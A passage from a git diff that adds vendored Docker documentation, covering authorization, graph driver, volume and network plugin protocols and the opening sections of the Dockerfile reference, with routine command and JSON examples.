flow](images/authz_deny.png) + +Each request sent to the plugin includes the authenticated user, the HTTP +headers, and the request/response body. Only the user name and the +authentication method used are passed to the plugin. Most importantly, no user +credentials or tokens are passed. Finally, not all request/response bodies +are sent to the authorization plugin. Only those request/response bodies where +the `Content-Type` is either `text/*` or `application/json` are sent. + +For commands that can potentially hijack the HTTP connection (`HTTP +Upgrade`), such as `exec`, the authorization plugin is only called for the +initial HTTP requests. Once the plugin approves the command, authorization is +not applied to the rest of the flow. Specifically, the streaming data is not +passed to the authorization plugins. For commands that return chunked HTTP +response, such as `logs` and `events`, only the HTTP request is sent to the +authorization plugins. + +During request/response processing, some authorization flows might +need to do additional queries to the Docker daemon. To complete such flows, +plugins can call the daemon API similar to a regular user. To enable these +additional queries, the plugin must provide the means for an administrator to +configure proper authentication and security policies. + +## Docker client flows + +To enable and configure the authorization plugin, the plugin developer must +support the Docker client interactions detailed in this section. + +### Setting up Docker daemon + +Enable the authorization plugin with a dedicated command line flag in the +`--authorization-plugin=PLUGIN_ID` format. The flag supplies a `PLUGIN_ID` +value. This value can be the plugin’s socket or a path to a specification file. +Authorization plugins can be loaded without restarting the daemon. Refer +to the [`dockerd` documentation](../reference/commandline/dockerd.md#configuration-reloading) for more information. + +```bash +$ dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... +``` + +Docker's authorization subsystem supports multiple `--authorization-plugin` parameters. + +### Calling authorized command (allow) + +```bash +$ docker pull centos +... +f1b10cd84249: Pull complete +... +``` + +### Calling unauthorized command (deny) + +```bash +$ docker pull centos +... +docker: Error response from daemon: authorization denied by plugin PLUGIN_NAME: volumes are not allowed. +``` + +### Error from plugins + +```bash +$ docker pull centos +... +docker: Error response from daemon: plugin PLUGIN_NAME failed with error: AuthZPlugin.AuthZReq: Cannot connect to the Docker daemon. Is the docker daemon running on this host?. +``` + +## API schema and implementation + +In addition to Docker's standard plugin registration method, each plugin +should implement the following two methods: + +* `/AuthZPlugin.AuthZReq` This authorize request method is called before the Docker daemon processes the client request. + +* `/AuthZPlugin.AuthZRes` This authorize response method is called before the response is returned from Docker daemon to the client. + +#### /AuthZPlugin.AuthZReq + +**Request**: + +```json +{ + "User": "The user identification", + "UserAuthNMethod": "The authentication method used", + "RequestMethod": "The HTTP method", + "RequestURI": "The HTTP request URI", + "RequestBody": "Byte array containing the raw HTTP request body", + "RequestHeader": "Byte array containing the raw HTTP request header as a map[string][]string " +} +``` + +**Response**: + +```json +{ + "Allow": "Determined whether the user is allowed or not", + "Msg": "The authorization message", + "Err": "The error message if things go wrong" +} +``` +#### /AuthZPlugin.AuthZRes + +**Request**: + +```json +{ + "User": "The user identification", + "UserAuthNMethod": "The authentication method used", + "RequestMethod": "The HTTP method", + "RequestURI": "The HTTP request URI", + "RequestBody": "Byte array containing the raw HTTP request body", + "RequestHeader": "Byte array containing the raw HTTP request header as a map[string][]string", + "ResponseBody": "Byte array containing the raw HTTP response body", + "ResponseHeader": "Byte array containing the raw HTTP response header as a map[string][]string", + "ResponseStatusCode":"Response status code" +} +``` + +**Response**: + +```json +{ + "Allow": "Determined whether the user is allowed or not", + "Msg": "The authorization message", + "Err": "The error message if things go wrong" +} +``` + +### Request authorization + +Each plugin must support two request authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. The tables below detail the content expected in each message. + +#### Daemon -> Plugin + +Name | Type | Description +-----------------------|-------------------|------------------------------------------------------- +User | string | The user identification +Authentication method | string | The authentication method used +Request method | enum | The HTTP method (GET/DELETE/POST) +Request URI | string | The HTTP request URI including API version (e.g., v.1.17/containers/json) +Request headers | map[string]string | Request headers as key value pairs (without the authorization header) +Request body | []byte | Raw request body + + +#### Plugin -> Daemon + +Name | Type | Description +--------|--------|---------------------------------------------------------------------------------- +Allow | bool | Boolean value indicating whether the request is allowed or denied +Msg | string | Authorization message (will be returned to the client in case the access is denied) +Err | string | Error message (will be returned to the client in case the plugin encounter an error. The string value supplied may appear in logs, so should not include confidential information) + +### Response authorization + +The plugin must support two authorization messages formats, one from the daemon to the plugin and then from the plugin to the daemon. The tables below detail the content expected in each message. + +#### Daemon -> Plugin + + +Name | Type | Description +----------------------- |------------------ |---------------------------------------------------- +User | string | The user identification +Authentication method | string | The authentication method used +Request method | string | The HTTP method (GET/DELETE/POST) +Request URI | string | The HTTP request URI including API version (e.g., v.1.17/containers/json) +Request headers | map[string]string | Request headers as key value pairs (without the authorization header) +Request body | []byte | Raw request body +Response status code | int | Status code from the docker daemon +Response headers | map[string]string | Response headers as key value pairs +Response body | []byte | Raw docker daemon response body + + +#### Plugin -> Daemon + +Name | Type | Description +--------|--------|---------------------------------------------------------------------------------- +Allow | bool | Boolean value indicating whether the response is allowed or denied +Msg | string | Authorization message (will be returned to the client in case the access is denied) +Err | string | Error message (will be returned to the client in case the plugin encounter an error. The string value supplied may appear in logs, so should not include confidential information) diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md b/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md new file mode 100644 index 0000000000..d91c383b5f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md @@ -0,0 +1,376 @@ +--- +title: "Graphdriver plugins" +description: "How to manage image and container filesystems with external plugins" +keywords: "Examples, Usage, storage, image, docker, data, graph, plugin, api" +advisory: experimental +--- + + + + +## Changelog + +### 1.13.0 + +- Support v2 plugins + +# Docker graph driver plugins + +Docker graph driver plugins enable admins to use an external/out-of-process +graph driver for use with Docker engine. This is an alternative to using the +built-in storage drivers, such as aufs/overlay/devicemapper/btrfs. + +You need to install and enable the plugin and then restart the Docker daemon +before using the plugin. See the following example for the correct ordering +of steps. + +``` +$ docker plugin install cpuguy83/docker-overlay2-graphdriver-plugin # this command also enables the driver + +$ pkill dockerd +$ dockerd --experimental -s cpuguy83/docker-overlay2-graphdriver-plugin +``` + +# Write a graph driver plugin + +See the [plugin documentation](/docs/extend/index.md) for detailed information +on the underlying plugin protocol. + + +## Graph Driver plugin protocol + +If a plugin registers itself as a `GraphDriver` when activated, then it is +expected to provide the rootfs for containers as well as image layer storage. + +### /GraphDriver.Init + +**Request**: +```json +{ + "Home": "/graph/home/path", + "Opts": [], + "UIDMaps": [], + "GIDMaps": [] +} +``` + +Initialize the graph driver plugin with a home directory and array of options. +These are passed through from the user, but the plugin is not required to parse +or honor them. + +The request also includes a list of UID and GID mappings, structed as follows: +```json +{ + "ContainerID": 0, + "HostID": 0, + "Size": 0 +} +``` + +**Response**: +```json +{ + "Err": "" +} +``` + +Respond with a non-empty string error if an error occurred. + + +### /GraphDriver.Create + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", + "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142", + "MountLabel": "", + "StorageOpt": {} +} +``` + +Create a new, empty, read-only filesystem layer with the specified +`ID`, `Parent` and `MountLabel`. If `Parent` is an empty string, there is no +parent layer. `StorageOpt` is map of strings which indicate storage options. + +**Response**: +```json +{ + "Err": "" +} +``` + +Respond with a non-empty string error if an error occurred. + +### /GraphDriver.CreateReadWrite + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", + "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142", + "MountLabel": "", + "StorageOpt": {} +} +``` + +Similar to `/GraphDriver.Create` but creates a read-write filesystem layer. + +### /GraphDriver.Remove + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187" +} +``` + +Remove the filesystem layer with this given `ID`. + +**Response**: +```json +{ + "Err": "" +} +``` + +Respond with a non-empty string error if an error occurred. + +### /GraphDriver.Get + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", + "MountLabel": "" +} +``` + +Get the mountpoint for the layered filesystem referred to by the given `ID`. + +**Response**: +```json +{ + "Dir": "/var/mygraph/46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", + "Err": "" +} +``` + +Respond with the absolute path to the mounted layered filesystem. +Respond with a non-empty string error if an error occurred. + +### /GraphDriver.Put + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187" +} +``` + +Release the system resources for the specified `ID`, such as unmounting the +filesystem layer. + +**Response**: +```json +{ + "Err": "" +} +``` + +Respond with a non-empty string error if an error occurred. + +### /GraphDriver.Exists + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187" +} +``` + +Determine if a filesystem layer with the specified `ID` exists. + +**Response**: +```json +{ + "Exists": true +} +``` + +Respond with a boolean for whether or not the filesystem layer with the specified +`ID` exists. + +### /GraphDriver.Status + +**Request**: +```json +{} +``` + +Get low-level diagnostic information about the graph driver. + +**Response**: +```json +{ + "Status": [[]] +} +``` + +Respond with a 2-D array with key/value pairs for the underlying status +information. + + +### /GraphDriver.GetMetadata + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187" +} +``` + +Get low-level diagnostic information about the layered filesystem with the +with the specified `ID` + +**Response**: +```json +{ + "Metadata": {}, + "Err": "" +} +``` + +Respond with a set of key/value pairs containing the low-level diagnostic +information about the layered filesystem. +Respond with a non-empty string error if an error occurred. + +### /GraphDriver.Cleanup + +**Request**: +```json +{} +``` + +Perform necessary tasks to release resources help by the plugin, such as +unmounting all the layered file systems. + +**Response**: +```json +{ + "Err": "" +} +``` + +Respond with a non-empty string error if an error occurred. + + +### /GraphDriver.Diff + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", + "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142" +} +``` + +Get an archive of the changes between the filesystem layers specified by the `ID` +and `Parent`. `Parent` may be an empty string, in which case there is no parent. + +**Response**: +``` +{{ TAR STREAM }} +``` + +### /GraphDriver.Changes + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", + "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142" +} +``` + +Get a list of changes between the filesystem layers specified by the `ID` and +`Parent`. If `Parent` is an empty string, there is no parent. + +**Response**: +```json +{ + "Changes": [{}], + "Err": "" +} +``` + +Respond with a list of changes. The structure of a change is: +```json + "Path": "/some/path", + "Kind": 0, +``` + +Where the `Path` is the filesystem path within the layered filesystem that is +changed and `Kind` is an integer specifying the type of change that occurred: + +- 0 - Modified +- 1 - Added +- 2 - Deleted + +Respond with a non-empty string error if an error occurred. + +### /GraphDriver.ApplyDiff + +**Request**: +``` +{{ TAR STREAM }} +``` + +Extract the changeset from the given diff into the layer with the specified `ID` +and `Parent` + +**Query Parameters**: + +- id (required)- the `ID` of the new filesystem layer to extract the diff to +- parent (required)- the `Parent` of the given `ID` + +**Response**: +```json +{ + "Size": 512366, + "Err": "" +} +``` + +Respond with the size of the new layer in bytes. +Respond with a non-empty string error if an error occurred. + +### /GraphDriver.DiffSize + +**Request**: +```json +{ + "ID": "46fe8644f2572fd1e505364f7581e0c9dbc7f14640bd1fb6ce97714fb6fc5187", + "Parent": "2cd9c322cb78a55e8212aa3ea8425a4180236d7106938ec921d0935a4b8ca142" +} +``` + +Calculate the changes between the specified `ID` + +**Response**: +```json +{ + "Size": 512366, + "Err": "" +} +``` + +Respond with the size changes between the specified `ID` and `Parent` +Respond with a non-empty string error if an error occurred. diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_network.md b/vendor/github.com/docker/docker/docs/extend/plugins_network.md new file mode 100644 index 0000000000..a974862fa6 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/plugins_network.md @@ -0,0 +1,77 @@ +--- +title: "Docker network driver plugins" +description: "Network driver plugins." +keywords: "Examples, Usage, plugins, docker, documentation, user guide" +--- + + + +# Engine network driver plugins + +This document describes Docker Engine network driver plugins generally +available in Docker Engine. To view information on plugins +managed by Docker Engine, refer to [Docker Engine plugin system](index.md). + +Docker Engine network plugins enable Engine deployments to be extended to +support a wide range of networking technologies, such as VXLAN, IPVLAN, MACVLAN +or something completely different. Network driver plugins are supported via the +LibNetwork project. Each plugin is implemented as a "remote driver" for +LibNetwork, which shares plugin infrastructure with Engine. Effectively, network +driver plugins are activated in the same way as other plugins, and use the same +kind of protocol. + +## Network driver plugins and swarm mode + +Docker 1.12 adds support for cluster management and orchestration called +[swarm mode](https://docs.docker.com/engine/swarm/). Docker Engine running in swarm mode currently +only supports the built-in overlay driver for networking. Therefore existing +networking plugins will not work in swarm mode. + +When you run Docker Engine outside of swarm mode, all networking plugins that +worked in Docker 1.11 will continue to function normally. They do not require +any modification. + +## Using network driver plugins + +The means of installing and running a network driver plugin depend on the +particular plugin. So, be sure to install your plugin according to the +instructions obtained from the plugin developer. + +Once running however, network driver plugins are used just like the built-in +network drivers: by being mentioned as a driver in network-oriented Docker +commands. For example, + + $ docker network create --driver weave mynet + +Some network driver plugins are listed in [plugins](legacy_plugins.md) + +The `mynet` network is now owned by `weave`, so subsequent commands +referring to that network will be sent to the plugin, + + $ docker run --network=mynet busybox top + + +## Write a network plugin + +Network plugins implement the [Docker plugin +API](plugin_api.md) and the network plugin protocol + +## Network plugin protocol + +The network driver protocol, in addition to the plugin activation call, is +documented as part of libnetwork: +[https://github.com/docker/libnetwork/blob/master/docs/remote.md](https://github.com/docker/libnetwork/blob/master/docs/remote.md). + +# Related Information + +To interact with the Docker maintainers and other interested users, see the IRC channel `#docker-network`. + +- [Docker networks feature overview](https://docs.docker.com/engine/userguide/networking/) +- The [LibNetwork](https://github.com/docker/libnetwork) project diff --git a/vendor/github.com/docker/docker/docs/extend/plugins_volume.md b/vendor/github.com/docker/docker/docs/extend/plugins_volume.md new file mode 100644 index 0000000000..c060bf39b1 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/extend/plugins_volume.md @@ -0,0 +1,276 @@ +--- +title: "Volume plugins" +description: "How to manage data with external volume plugins" +keywords: "Examples, Usage, volume, docker, data, volumes, plugin, api" +--- + + + +# Write a volume plugin + +Docker Engine volume plugins enable Engine deployments to be integrated with +external storage systems, such as Amazon EBS, and enable data volumes to persist +beyond the lifetime of a single Engine host. See the +[plugin documentation](legacy_plugins.md) for more information. + +## Changelog + +### 1.13.0 + +- If used as part of the v2 plugin architecture, mountpoints that are part of paths returned by plugin have to be mounted under the directory specified by PropagatedMount in the plugin configuration [#26398](https://github.com/docker/docker/pull/26398) + +### 1.12.0 + +- Add `Status` field to `VolumeDriver.Get` response ([#21006](https://github.com/docker/docker/pull/21006#)) +- Add `VolumeDriver.Capabilities` to get capabilities of the volume driver([#22077](https://github.com/docker/docker/pull/22077)) + +### 1.10.0 + +- Add `VolumeDriver.Get` which gets the details about the volume ([#16534](https://github.com/docker/docker/pull/16534)) +- Add `VolumeDriver.List` which lists all volumes owned by the driver ([#16534](https://github.com/docker/docker/pull/16534)) + +### 1.8.0 + +- Initial support for volume driver plugins ([#14659](https://github.com/docker/docker/pull/14659)) + +## Command-line changes + +A volume plugin makes use of the `-v`and `--volume-driver` flag on the `docker run` command. The `-v` flag accepts a volume name and the `--volume-driver` flag a driver type, for example: + + $ docker run -ti -v volumename:/data --volume-driver=flocker busybox sh + +This command passes the `volumename` through to the volume plugin as a +user-given name for the volume. The `volumename` must not begin with a `/`. + +By having the user specify a `volumename`, a plugin can associate the volume +with an external volume beyond the lifetime of a single container or container +host. This can be used, for example, to move a stateful container from one +server to another. + +By specifying a `volumedriver` in conjunction with a `volumename`, users can use plugins such as [Flocker](https://clusterhq.com/docker-plugin/) to manage volumes external to a single host, such as those on EBS. + + +## Create a VolumeDriver + +The container creation endpoint (`/containers/create`) accepts a `VolumeDriver` +field of type `string` allowing to specify the name of the driver. It's default +value of `"local"` (the default driver for local volumes). + +## Volume plugin protocol + +If a plugin registers itself as a `VolumeDriver` when activated, then it is +expected to provide writeable paths on the host filesystem for the Docker +daemon to provide to containers to consume. + +The Docker daemon handles bind-mounting the provided paths into user +containers. + +> **Note**: Volume plugins should *not* write data to the `/var/lib/docker/` +> directory, including `/var/lib/docker/volumes`. The `/var/lib/docker/` +> directory is reserved for Docker. + +### /VolumeDriver.Create + +**Request**: +```json +{ + "Name": "volume_name", + "Opts": {} +} +``` + +Instruct the plugin that the user wants to create a volume, given a user +specified volume name. The plugin does not need to actually manifest the +volume on the filesystem yet (until Mount is called). +Opts is a map of driver specific options passed through from the user request. + +**Response**: +```json +{ + "Err": "" +} +``` + +Respond with a string error if an error occurred. + +### /VolumeDriver.Remove + +**Request**: +```json +{ + "Name": "volume_name" +} +``` + +Delete the specified volume from disk. This request is issued when a user invokes `docker rm -v` to remove volumes associated with a container. + +**Response**: +```json +{ + "Err": "" +} +``` + +Respond with a string error if an error occurred. + +### /VolumeDriver.Mount + +**Request**: +```json +{ + "Name": "volume_name", + "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c" +} +``` + +Docker requires the plugin to provide a volume, given a user specified volume +name. This is called once per container start. If the same volume_name is requested +more than once, the plugin may need to keep track of each new mount request and provision +at the first mount request and deprovision at the last corresponding unmount request. + +`ID` is a unique ID for the caller that is requesting the mount. + +**Response**: +```json +{ + "Mountpoint": "/path/to/directory/on/host", + "Err": "" +} +``` + +Respond with the path on the host filesystem where the volume has been made +available, and/or a string error if an error occurred. + +### /VolumeDriver.Path + +**Request**: +```json +{ + "Name": "volume_name" +} +``` + +Docker needs reminding of the path to the volume on the host. + +**Response**: +```json +{ + "Mountpoint": "/path/to/directory/on/host", + "Err": "" +} +``` + +Respond with the path on the host filesystem where the volume has been made +available, and/or a string error if an error occurred. `Mountpoint` is optional, +however the plugin may be queried again later if one is not provided. + +### /VolumeDriver.Unmount + +**Request**: +```json +{ + "Name": "volume_name", + "ID": "b87d7442095999a92b65b3d9691e697b61713829cc0ffd1bb72e4ccd51aa4d6c" +} +``` + +Indication that Docker no longer is using the named volume. This is called once +per container stop. Plugin may deduce that it is safe to deprovision it at +this point. + +`ID` is a unique ID for the caller that is requesting the mount. + +**Response**: +```json +{ + "Err": "" +} +``` + +Respond with a string error if an error occurred. + + +### /VolumeDriver.Get + +**Request**: +```json +{ + "Name": "volume_name" +} +``` + +Get the volume info. + + +**Response**: +```json +{ + "Volume": { + "Name": "volume_name", + "Mountpoint": "/path/to/directory/on/host", + "Status": {} + }, + "Err": "" +} +``` + +Respond with a string error if an error occurred. `Mountpoint` and `Status` are +optional. + + +### /VolumeDriver.List + +**Request**: +```json +{} +``` + +Get the list of volumes registered with the plugin. + +**Response**: +```json +{ + "Volumes": [ + { + "Name": "volume_name", + "Mountpoint": "/path/to/directory/on/host" + } + ], + "Err": "" +} +``` + +Respond with a string error if an error occurred. `Mountpoint` is optional. + +### /VolumeDriver.Capabilities + +**Request**: +```json +{} +``` + +Get the list of capabilities the driver supports. +The driver is not required to implement this endpoint, however in such cases +the default values will be taken. + +**Response**: +```json +{ + "Capabilities": { + "Scope": "global" + } +} +``` + +Supported scopes are `global` and `local`. Any other value in `Scope` will be +ignored and assumed to be `local`. Scope allows cluster managers to handle the +volume differently, for instance with a scope of `global`, the cluster manager +knows it only needs to create the volume once instead of on every engine. More +capabilities may be added in the future. diff --git a/vendor/github.com/docker/docker/docs/reference/builder.md b/vendor/github.com/docker/docker/docs/reference/builder.md new file mode 100644 index 0000000000..6fa5a24150 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/builder.md @@ -0,0 +1,1746 @@ +--- +title: "Dockerfile reference" +description: "Dockerfiles use a simple DSL which allows you to automate the steps you would normally manually take to create an image." +keywords: "builder, docker, Dockerfile, automation, image creation" +--- + + + +# Dockerfile reference + +Docker can build images automatically by reading the instructions from a +`Dockerfile`. A `Dockerfile` is a text document that contains all the commands a +user could call on the command line to assemble an image. Using `docker build` +users can create an automated build that executes several command-line +instructions in succession. + +This page describes the commands you can use in a `Dockerfile`. When you are +done reading this page, refer to the [`Dockerfile` Best +Practices](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/) for a tip-oriented guide. + +## Usage + +The [`docker build`](commandline/build.md) command builds an image from +a `Dockerfile` and a *context*. The build's context is the files at a specified +location `PATH` or `URL`. The `PATH` is a directory on your local filesystem. +The `URL` is a Git repository location. + +A context is processed recursively. So, a `PATH` includes any subdirectories and +the `URL` includes the repository and its submodules. A simple build command +that uses the current directory as context: + + $ docker build . + Sending build context to Docker daemon 6.51 MB + ... + +The build is run by the Docker daemon, not by the CLI. The first thing a build +process does is send the entire context (recursively) to the daemon. In most +cases, it's best to start with an empty directory as context and keep your +Dockerfile in that directory. Add only the files needed for building the +Dockerfile. + +>**Warning**: Do not use your root directory, `/`, as the `PATH` as it causes +>the build to transfer the entire contents of your hard drive to the Docker +>daemon. + +To use a file in the build context, the `Dockerfile` refers to the file specified +in an instruction, for example, a `COPY` instruction. To increase the build's +performance, exclude files and directories by adding a `.dockerignore` file to +the context directory. For information about how to [create a `.dockerignore` +file](#dockerignore-file) see the documentation on this page. + +Traditionally, the `Dockerfile` is called `Dockerfile` and located in the root +of the context. You use the `-f` flag with `docker build` to point to a Dockerfile +anywhere in your file system. + + $ docker build -f /path/to/a/Dockerfile . + +You can specify a repository and tag at which to save the new image if +the build succeeds: + + $ docker build -t shykes/myapp . + +To tag the image into multiple repositories after the build, +add multiple `-t` parameters when you run the `build` command: + + $ docker build -t shykes/myapp:1.0.2 -t shykes/myapp:latest . + +Before the Docker daemon runs the instructions in the `Dockerfile`, it performs +a preliminary validation of the `Dockerfile` and returns an error if the syntax is incorrect: + + $ docker build -t test/myapp . + Sending build context to Docker daemon 2.048 kB + Error response from daemon: Unknown instruction: RUNCMD + +The Docker daemon runs the instructions in the `Dockerfile` one-by-one, +committing the result of each instruction +to a new image if necessary, before finally outputting the ID of your +new image. The Docker daemon will automatically clean up the context you +sent. + +Note that each instruction is run independently, and causes a new image +to be created - so `RUN cd /tmp` will not have any effect on the next +instructions. + +Whenever possible, Docker will re-use the intermediate images (cache), +to accelerate the `docker build` process significantly. This is indicated by +the `Using cache` message in the console output. +(For more information, see the [Build cache section](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache)) in the +`Dockerfile` best practices guide: + + $ docker build -t svendowideit/ambassador . + Sending build context to Docker daemon 15.36 kB + Step 1/4 : FROM alpine:3.2 + ---> 31f630c65071 + Step 2/4 : MAINTAINER SvenDowideit@home.org.au + ---> Using cache + ---> 2a1c91448f5f + Step 3/4 : RUN apk update && apk add socat && rm -r /var/cache/ + ---> Using cache + ---> 21ed6e7fbb73 + Step 4/4 : CMD env | grep _TCP= | (sed 's/.*_PORT_\([0-9]*\)_TCP=tcp:\/\/\(.*\):\(.*\)/socat -t 100000000 TCP4-LISTEN:\1,fork,reuseaddr TCP4:\2:\3 \&/' && echo wait) | sh + ---> Using cache + ---> 7ea8aef582cc + Successfully built 7ea8aef582cc + +Build cache is only used from images that have a local parent chain. This means +that these images were created by previous builds or the whole chain of images +was loaded with `docker load`. If you wish to use build cache of a specific +image you can specify it with `--cache-from` option. Images specified with +`--cache-from` do not need to have a parent chain and may be pulled from other +registries. + +When you're done with your build, you're ready to look into [*Pushing a +repository to its registry*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub). + +## Format + +Here is the format of the `Dockerfile`: + +```Dockerfile +# Comment +INSTRUCTION arguments +``` + +The instruction is not case-sensitive. However, convention is for them to +be UPPERCASE to distinguish them from arguments more easily. + + +Docker runs instructions in a `Dockerfile` in order. **The first +instruction must be \`FROM\`** in order to specify the [*Base +Image*](glossary.md#base-image) from which you are building. + +Docker treats lines that *begin* with `#` as a comment, unless the line is +a valid [parser directive](#parser-directives). A `#` marker anywhere +else in a line is treated as an argument. This allows statements like: + +```Dockerfile +# Comment +RUN echo 'we are running some # of cool things' +``` + +Line continuation characters are not supported in comments. + +## Parser directives + +Parser directives are optional, and affect the way in which subsequent lines +in a `Dockerfile` are handled. Parser directives do not add layers to the build, +and will not be shown as a build step. Parser directives are written as a +special type of comment in the form `# directive=value`. A single directive +may only be used once. + +Once a comment, empty line or builder instruction has been processed, Docker +no longer looks for parser directives. Instead it treats anything formatted +as a parser directive as a comment and does not attempt to validate if it might +be a parser directive. Therefore, all parser directives must be at the very +top of a `Dockerfile`. + +Parser directives are not case-sensitive. However, convention is for them to +be lowercase. Convention is also to include a blank line following any +parser directives. Line continuation characters are not supported in parser +directives. + +Due to these rules, the following examples are all invalid: + +Invalid due to line continuation: + +```Dockerfile +# direc \ +tive=value +``` + +Invalid due to appearing twice: + +```Dockerfile +# directive=value1 +# directive=value2 + +FROM ImageName +``` + +Treated as a comment due to appearing after a builder instruction: + +```Dockerfile +FROM ImageName +# directive=value +``` + +Treated as a comment due to appearing after a comment which is not a parser +directive: + +```Dockerfile +# About my dockerfile +FROM ImageName +# directive=value +``` + +The unknown directive is treated as a comment due to not being recognized. In +addition, the known directive is treated as a comment due to appearing after +a comment which is not a parser directive. + +```Dockerfile +# unknowndirective=value +# knowndirective=value +``` + +Non line-breaking whitespace is permitted in a parser directive. Hence, the +following lines are all treated identically: + +```Dockerfile +#directive=value +# directive =value +# directive= value +# directive = value +# dIrEcTiVe=value +``` + +The following parser directive is supported: + +* `escape` + +## escape + + # escape=\ (backslash) + +Or + + # escape=` (backtick) + +The `escape` directive sets the character used to escape characters in a +`Dockerfile`. If not specified, the default escape character is `\`. + +The escape character is used both to escape characters in a line, and to +escape a newline. This allows a `Dockerfile` instruction to +span multiple lines. Note that regardless of whether the `escape` parser +directive is included in a `Dockerfile`, *escaping is not performed in +a `RUN` command, except at the end of a line.* + +Setting the escape character to `` ` `` is especially useful on +`Windows`, where `\` is the directory path separator. `` ` `` is consistent +with [Windows PowerShell](https://technet.microsoft.com/en-us/library/hh847755.aspx). + +Consider the following example which would fail in a non-obvious way on +`Windows`. The second `\` at the end of the second line would be interpreted as an +escape for the newline, instead of a target of the escape from the first `\`. +Similarly, the `\` at the end of the third line would, assuming it was actually +handled as an instruction, cause it be treated as a line continuation. The result +of this dockerfile is that second and third lines are considered a single +instruction: + +```Dockerfile +FROM microsoft/nanoserver +COPY testfile.txt c:\\ +RUN dir c:\ +``` + +Results in: + + PS C:\John> docker build -t cmd . + Sending build context to Docker daemon 3.072 kB + Step 1/2 : FROM microsoft/nanoserver + ---> 22738ff49c6d + Step 2/2 : COPY testfile.txt c:\RUN dir c: + GetFileAttributesEx c:RUN: The system cannot find the file specified. + PS C:\John> + +One solution to the above would be to use `/` as the target of both the `COPY` +instruction, and `dir`. However, this syntax is, at best, confusing as it is not +natural for paths on `Windows`, and at worst, error prone as not all commands on +`Windows` support `/` as the path separator. + +By adding the `escape` parser directive, the following `Dockerfile` succeeds as +expected with the use of natural platform semantics for file paths on `Windows`: + + # escape=` + + FROM microsoft/nanoserver + COPY testfile.txt c:\ + RUN dir c:\ + +Results in: + + PS C:\John> docker build -t succeeds --no-cache=true . + Sending build context to Docker daemon 3.072 kB + Step 1/3 : FROM microsoft/nanoserver + ---> 22738ff49c6d + Step 2/3 : COPY testfile.txt c:\ + ---> 96655de338de + Removing intermediate container 4db9acbb1682 + Step 3/3 : RUN dir c:\ + ---> Running in a2c157f842f5 + Volume in drive C has no label. + Volume Serial Number is 7E6D-E0F7 + + Directory of c:\ + + 10/05/2016 05:04 PM 1,894 License.txt + 10/05/2016 02:22 PM

Program Files + 10/05/2016 02:14 PM Program Files (x86) + 10/28/2016 11:18 AM 62 testfile.txt + 10/28/2016 11:20 AM Users + 10/28/2016 11:20 AM Windows + 2 File(s) 1,956 bytes + 4 Dir(s) 21,259,096,064 bytes free + ---> 01c7f3bef04f + Removing intermediate container a2c157f842f5 + Successfully built 01c7f3bef04f + PS C:\John> + +## Environment replacement + +Environment variables (declared with [the `ENV` statement](#env)) can also be +used in certain instructions as variables to be interpreted by the +`Dockerfile`. Escapes are also handled for including variable-like syntax +into a statement literally. + +Environment variables are notated in the `Dockerfile` either with +`$variable_name` or `${variable_name}`. They are treated equivalently and the +brace syntax is typically used to address issues with variable names with no +whitespace, like `${foo}_bar`. + +The `${variable_name}` syntax also supports a few of the standard `bash` +modifiers as specified below: + +* `${variable:-word}` indicates that if `variable` is set then the result + will be that value. If `variable` is not set then `word` will be the result. +* `${variable:+word}` indicates that if `variable` is set then `word` will be + the result, otherwise the result is the empty string. + +In all cases, `word` can be any string, including additional environment +variables. + +Escaping is possible by adding a `\` before the variable: `\$foo` or `\${foo}`, +for example, will translate to `$foo` and `${foo}` literals respectively. + +Example (parsed representation is displayed after the `#`): + + FROM busybox + ENV foo /bar + WORKDIR ${foo} # WORKDIR /bar + ADD . $foo # ADD . /bar + COPY \$foo /quux # COPY $foo /quux + +Environment variables are supported by the following list of instructions in +the `Dockerfile`: + +* `ADD` +* `COPY` +* `ENV` +* `EXPOSE` +* `LABEL` +* `USER` +* `WORKDIR` +* `VOLUME` +* `STOPSIGNAL` + +as well as: + +* `ONBUILD` (when combined with one of the supported instructions above) + +> **Note**: +> prior to 1.4, `ONBUILD` instructions did **NOT** support environment +> variable, even when combined with any of the instructions listed above. + +Environment variable substitution will use the same value for each variable +throughout the entire command. In other words, in this example: + + ENV abc=hello + ENV abc=bye def=$abc + ENV ghi=$abc + +will result in `def` having a value of `hello`, not `bye`. However, +`ghi` will have a value of `bye` because it is 